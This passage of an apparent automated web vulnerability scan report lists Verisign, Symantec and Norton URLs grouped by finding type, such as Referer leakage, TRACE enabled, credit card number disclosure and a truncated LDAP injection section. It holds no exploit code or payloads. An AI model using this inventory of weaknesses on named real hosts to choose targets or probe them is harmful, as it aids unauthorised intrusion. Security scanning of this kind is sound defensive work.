13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html

13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html

13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html

13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html

13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html

13.6. https://knowledge.verisign.ch/support/mpki-support/index.html

13.7. https://knowledge.verisign.ch/support/mpki-support/index.html

13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index

13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index

13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html

13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html

13.15. http://query.verisign.ch/search

13.16. http://query.verisign.ch/search

13.17. https://renewals.symantec.com/renewals/chat_form.jsp

13.18. http://www.verisign.ch/

13.19. http://www.verisign.ch/

13.20. http://www.verisign.ch/contact-information/index.html

13.21. http://www.verisign.ch/contact-information/index.html

13.22. http://www.verisign.ch/corporate/index.html

13.23. http://www.verisign.ch/corporate/index.html

13.24. http://www.verisign.ch/trust-seal/index.html

13.25. http://www.verisign.ch/trust-seal/index.html

14. Cross-domain Referer leakage

14.1. http://blogs.verisign.com/

14.2. http://buy.norton.com/estore/mf/landingProductFeatures

14.3. http://buy.norton.com/estore/mf/upgradeRenewal

14.4. http://community.norton.com/norton/

14.5. http://investor.symantec.com/phoenix.zhtml

14.6. http://investor.symantec.com/phoenix.zhtml

14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html

14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html

14.9. https://knowledge.verisign.ch/support/mpki-support/index.html

14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index

14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html

14.13. https://knowledge.verisign.com/support/code-signing-support/index

14.14. https://knowledge.verisign.com/support/code-signing-support/index.html

14.15. https://knowledge.verisign.com/support/digital-id-support/index.html

14.16. https://knowledge.verisign.com/support/eca-support/index.html

14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

14.19. https://knowledge.verisign.com/support/mpki-support/index.html

14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index

14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html

14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs

14.24. http://player.ooyala.com/player.js

14.25. http://query.verisign.com/search

14.26. http://searchg.symantec.com/search

14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch

14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200

14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq

14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/

14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/

14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/

14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7

14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/

14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400

14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/

14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300

14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login

14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login

14.40. http://store.symantec.com/

14.41. https://symantec-corporation.com/servlet/campaignrespondent

14.42. https://trust-center.verisign.ch/process/retail/console_login

14.43. https://trust-center.verisign.com/process/retail/console_login

14.44. https://trust-center.verisign.com/process/retail/trust_product_selector

14.45. http://updatecenter.norton.com/

14.46. http://us.norton.com/beta/index.jsp

14.47. http://us.norton.com/beta/overview.jsp

14.48. http://us.norton.com/norton-utilities/

14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp

14.50. http://us.norton.com/products/charts/comparison.jsp

14.51. http://us.norton.com/support/DIY/index.jsp

14.52. http://us.norton.com/support/dtree.jsp

14.53. http://us.norton.com/theme.jsp

14.54. http://us.norton.com/theme.jsp

14.55. http://us.norton.com/theme4.jsp

14.56. http://www.symantec.com/business/products/categories.jsp

14.57. http://www.symantec.com/business/products/purchasing.jsp

14.58. http://www.symantec.com/business/theme.jsp

14.59. http://www.symantec.com/business/verisign/fraud-detection-service

14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp

14.61. http://www.symantec.com/store/products/index.jsp

14.62. http://www.symantec.com/store/resources/index.jsp

14.63. http://www.symantec.com/store/services/index.jsp

14.64. http://www.verisign.ch/

14.65. http://www.verisign.ch/contact-information/index.html

14.66. http://www.verisign.ch/corporate/index.html

14.67. http://www.verisign.ch/trust-seal/index.html

14.68. http://www.verisign.com/code-signing/index.html

14.69. http://www.verisign.com/trust-seal/index.html

14.70. http://www.verisign.com/verisign-worldwide/index.html

15. Cross-domain script include

15.1. http://blogs.verisign.com/web-user-experience/

15.2. http://community.norton.com/norton/

15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline

15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1

15.5. http://de.community.norton.com/

15.6. http://free.pctools.com/free-antivirus/

15.7. http://investor.symantec.com/phoenix.zhtml

15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html

15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html

15.10. https://knowledge.verisign.ch/support/mpki-support/index.html

15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index

15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html

15.14. http://query.verisign.ch/search

15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch

15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login

15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login

15.18. http://store.symantec.com/

15.19. https://symantec-corporation.com/servlet/campaignrespondent

15.20. https://trust-center.verisign.ch/process/retail/console_login

15.21. https://trust-center.verisign.com/process/retail/console_login

15.22. https://trust-center.verisign.com/process/retail/help_and_support

15.23. https://trust-center.verisign.com/process/retail/trust_product_selector

15.24. http://us.norton.com/360

15.25. http://us.norton.com/downloads/index.jsp

15.26. http://us.norton.com/familyresources/index.jsp

15.27. http://us.norton.com/nortonlive/

15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp

15.29. http://us.norton.com/products/index.jsp

15.30. http://us.norton.com/security_response/index.jsp

15.31. http://www.symantec.com/connect/

15.32. http://www.verisign.ch/

15.33. http://www.verisign.ch/contact-information/index.html

15.34. http://www.verisign.ch/corporate/index.html

15.35. http://www.verisign.ch/trust-seal/index.html

15.36. http://www.verisign.com/

15.37. http://www.verisign.com/code-signing/index.html

15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html

15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

15.42. http://www.verisign.com/trust-seal/index.html

15.43. http://www.verisign.com/verisign-worldwide/index.html

15.44. https://www.verisign.com/

15.45. https://www.verisign.com/products-services/index.html

16. TRACE method is enabled

16.1. http://1168.ic-live.com/

16.2. http://blogs.verisign.com/

16.3. https://cert.webtrust.org/

16.4. https://donate.mozilla.org/

16.5. https://partnernet.symantec.com/

16.6. http://press.verisign.com/

16.7. https://press.verisign.com/

17. Email addresses disclosed

17.1. http://blogs.verisign.com/

17.2. http://blogs.verisign.com/web-user-experience/

17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js

17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

17.5. https://enterprise-ssl-admin.verisign.com/

17.6. https://fileconnect.symantec.com/javascript/calendar2.js

17.7. https://idprotect.verisign.com/learnmore.v

17.8. https://idprotect.verisign.com/orderstart.v

17.9. https://idprotect.verisign.com/toolbar/activate.v

17.10. https://idprotect.verisign.com/toolbar/download.v

17.11. https://idprotect.verisign.com/toolbar/home.v

17.12. https://idprotect.verisign.com/toolbar/install.v

17.13. https://idprotect.verisign.com/wheretouse.v

17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html

17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html

17.16. https://knowledge.verisign.ch/support/mpki-support/index.html

17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index

17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html

17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js

17.21. https://knowledge.verisign.com/support/code-signing-support/index

17.22. https://knowledge.verisign.com/support/code-signing-support/index.html

17.23. https://knowledge.verisign.com/support/digital-id-support/index.html

17.24. https://knowledge.verisign.com/support/eca-support/index.html

17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js

17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

17.28. https://knowledge.verisign.com/support/mpki-support/index.html

17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js

17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index

17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html

17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js

17.34. https://policy3.responsys.net/privacy.htm

17.35. https://press.verisign.com/easyir/customrel.do

17.36. http://query.verisign.ch/search

17.37. http://query.verisign.com/cluster.js

17.38. http://query.verisign.com/common.js

17.39. http://query.verisign.com/search

17.40. http://query.verisign.com/uri.js

17.41. https://query.verisign.com/search

17.42. https://renewals.symantec.com/renewals/chat_form.jsp

17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js

17.44. http://us.norton.com/beta/overview.jsp

17.45. http://us.norton.com/familyresources/index.jsp

17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js

17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v

17.48. http://vipmobile.verisign.com/home.v

17.49. https://vipmobile.verisign.com/home.v

17.50. https://vipmobile.verisign.com/supportedphones.v

17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp

17.52. http://www.symantec.com/business/theme.jsp

17.53. http://www.symantec.com/connect/

17.54. http://www.symantec.com/searchg/common.js

17.55. http://www.symantec.com/searchg/uri.js

17.56. http://www.verisign.ch/

17.57. http://www.verisign.ch/contact-information/index.html

17.58. http://www.verisign.ch/corporate/index.html

17.59. http://www.verisign.ch/trust-seal/index.html

17.60. http://www.verisign.com/

17.61. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

17.63. http://www.verisign.com/code-signing/index.html

17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html

17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

17.68. http://www.verisign.com/trust-seal/index.html

17.69. http://www.verisign.com/verisign-worldwide/index.html

17.70. https://www.verisign.com/

17.71. https://www.verisign.com/products-services/index.html

18. Private IP addresses disclosed

18.1. http://query.verisign.com/cluster.js

18.2. http://query.verisign.com/search

18.3. https://query.verisign.com/search

19. Credit card numbers disclosed

19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js

19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf

20. Robots.txt file

20.1. http://1168.ic-live.com/goat.php

20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif

20.3. https://admin.instantservice.com/links/5851/14753

20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png

20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif

20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/

20.7. http://buy.norton.com/

20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css

20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

20.10. http://ch.norton.com/

20.11. http://com-verisign.netmng.com/

20.12. http://community.norton.com/norton/

20.13. http://de.community.norton.com/

20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/

20.15. http://gs.instantservice.com/geoipAPI.js

20.16. http://investor.symantec.com/phoenix.zhtml

20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

20.18. https://knowledge.verisign.com/favicon.ico

20.19. http://l.addthiscdn.com/live/t00/200lo.gif

20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image

20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836

20.22. http://partnerlocator.symantec.com/public/search

20.23. http://player.ooyala.com/player.js

20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec

20.25. https://products.geotrust.com/signup/codesign.do

20.26. https://products.verisign.com/geocenter/reseller/logon.do

20.27. http://query.verisign.ch/search

20.28. http://query.verisign.com/search

20.29. https://query.verisign.com/search

20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js

20.31. http://searchg.symantec.com/search

20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login

20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login

20.34. https://symantec-corporation.com/servlet/campaignrespondent

20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard

20.36. https://test-products.verisign.com/geocenter/reseller/logon.do

20.37. https://trust-center.verisign.ch/process/retail/trust_initial

20.38. https://trust-center.verisign.com/process/retail/trust_initial

20.39. http://twitter.com/statuses/user_timeline/pctools.json

20.40. http://us.norton.com/index.jsp

20.41. https://us.norton.com/index.jsp

20.42. https://www-secure.symantec.com/feedback/webmaster.jsp

20.43. http://www.google-analytics.com/__utm.gif

20.44. http://www.symantec.com/scripts/swfobject.js

20.45. http://www.verisign.ch/

20.46. http://www.verisign.com/

20.47. https://www.verisign.com/products/site/

21. Cacheable HTTPS response

21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

21.14. https://cert.webtrust.org/ViewSeal

21.15. https://fileconnect.symantec.com/

21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer

21.17. https://idprotect.verisign.com/common/scripts/dlText.js

21.18. https://idprotect.verisign.com/secureredirect.v

21.19. https://idprotect.verisign.com/toolbar/downloadIE.v

21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html

21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html

21.22. https://knowledge.verisign.ch/support/mpki-support/index.html

21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index

21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html

21.26. https://knowledge.verisign.com/favicon.ico

21.27. https://knowledge.verisign.com/support/code-signing-support/index

21.28. https://knowledge.verisign.com/support/code-signing-support/index.html

21.29. https://knowledge.verisign.com/support/digital-id-support/index.html

21.30. https://knowledge.verisign.com/support/eca-support/index.html

21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

21.33. https://knowledge.verisign.com/support/mpki-support/index.html

21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index

21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html

21.37. https://partnernet.symantec.com/

21.38. https://policy3.responsys.net/

21.39. https://policy3.responsys.net/permission.htm

21.40. https://policy3.responsys.net/privacy.htm

21.41. https://press.verisign.com/easyir/customrel.do

21.42. https://products.verisign.com/geocenter/reseller/doregister.do

21.43. https://products.verisign.com/geocenter/reseller/logon.do

21.44. https://products.verisign.com/geocenter/reseller/logon.jsp

21.45. https://products.verisign.com/geocenter/reseller/register.do

21.46. https://query.verisign.com/search

21.47. https://renewals.symantec.com/renewals/application

21.48. https://renewals.symantec.com/renewals/chat_form.jsp

21.49. https://renewals.symantec.com/renewals/chat_norton.jsp

21.50. https://renewals.symantec.com/renewals/renewal_search.jsp

21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp

21.52. https://seal.verisign.com/getseal

21.53. https://securitycenter.verisign.com/

21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch

21.55. https://test-products.verisign.com/geocenter/reseller/logon.do

21.56. https://us.norton.com/index.jsp

21.57. https://vipmobile.verisign.com/home.v

21.58. https://vipmobile.verisign.com/supportedphones.v

21.59. https://www-secure.symantec.com/

21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp

21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp

21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp

21.63. https://www-secure.symantec.com/business/theme.jsp

21.64. https://www-secure.symantec.com/feedback/contactus.jsp

21.65. https://www-secure.symantec.com/feedback/webmaster.jsp

21.66. https://www-secure.symantec.com/globalsites/index.jsp

21.67. https://www-secure.symantec.com/index.jsp

21.68. https://www-secure.symantec.com/rss/index.jsp

21.69. https://www-secure.symantec.com/sitemap/index.jsp

21.70. https://www.verisign.com/

21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

21.73. https://www.verisign.com/products-services/index.html

22. HTML does not specify charset

22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff

22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js

22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

22.18. https://cert.webtrust.org/ViewSeal

22.19. https://enterprise-ssl-admin.verisign.com/

22.20. https://fileconnect.symantec.com/

22.21. https://fileconnect.symantec.com/favicon.ico

22.22. https://fileconnect.symantec.com/javascript/common.js

22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index

22.24. https://knowledge.verisign.com/support/code-signing-support/index

22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index

22.27. http://partnerlocator.symantec.com/

22.28. http://partnerlocator.symantec.com/public/product_finder

22.29. http://partnerlocator.symantec.com/public/pulldown_list

22.30. http://partnerlocator.symantec.com/public/search

22.31. https://partnernet.symantec.com/

22.32. http://player.ooyala.com/info/primary/

22.33. https://policy3.responsys.net/

22.34. https://renewals.symantec.com/renewals/chat_norton.jsp

22.35. https://securitycenter.verisign.com/

22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus

22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch

22.38. https://securitycenter.verisign.com/celp/enroll/retail

22.39. https://securitycenter.verisign.com/celp/enroll/upsell

22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

22.41. http://www.verisign.ch/

22.42. http://www.verisign.ch/assets/global/js/leftnav.js

22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js

22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js

22.45. http://www.verisign.ch/corporate/index.html

22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

22.48. http://www.verisign.com/

22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js

22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js

22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico

22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js

22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js

22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js

22.61. https://www.verisign.com/

22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

23. Content type incorrectly stated

23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7

23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff

23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg

23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg

23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js

23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg

23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

23.22. https://cert.webtrust.org/ViewSeal

23.23. http://com-verisign.netmng.com/

23.24. https://fileconnect.symantec.com/images/Sigstand.jpg

23.25. http://free.pctools.com/favicon.ico

23.26. http://gs.instantservice.com/geoipAPI.js

23.27. https://idprotect.verisign.com/common/scripts/dlText.js

23.28. https://idprotect.verisign.com/imageapp.v

23.29. https://idprotect.verisign.com/membersites.v

23.30. https://knowledge.verisign.com/favicon.ico

23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard

23.32. http://partnerlocator.symantec.com/public/product_finder

23.33. http://partnerlocator.symantec.com/public/pulldown_list

23.34. http://player.ooyala.com/info/primary/

23.35. http://player.ooyala.com/sas/authorized

23.36. http://query.verisign.com/cluster

23.37. http://sales.liveperson.net/hcp/html/mTag.js

23.38. https://seal.verisign.com/getseal

23.39. http://sr2.liveperson.net/hcp/html/mTag.js

23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

23.41. http://www.symantec.com/s/searchg/suggest

23.42. http://www.symantec.com/search/searchjs.jsp

23.43. http://www.verisign.ch/assets/global/js/leftnav.js

23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js

23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js

23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js

23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js

23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico

23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg

23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg

23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js

23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js

23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js

23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg

23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

24. Content type is not specified

24.1. https://fileconnect.symantec.com/javascript/calendar2.js

24.2. https://fileconnect.symantec.com/javascript/s_code.js

24.3. https://fileconnect.symantec.com/javascript/validations.js

24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer

24.5. http://l.player.ooyala.com/verify

24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js

24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js

24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js

24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js

24.10. https://renewals.symantec.com/renewals/js/getPageNames.js

24.11. https://renewals.symantec.com/renewals/js/modal.js

24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js

24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js

24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js

24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js

24.16. http://us.norton.com/www-uat.ges.sym

24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/

24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/

24.19. http://www.symantec.com/business/verisign/fraud-detection-service



1. LDAP injection  next
There are 12 instances of this issue:

Issue background

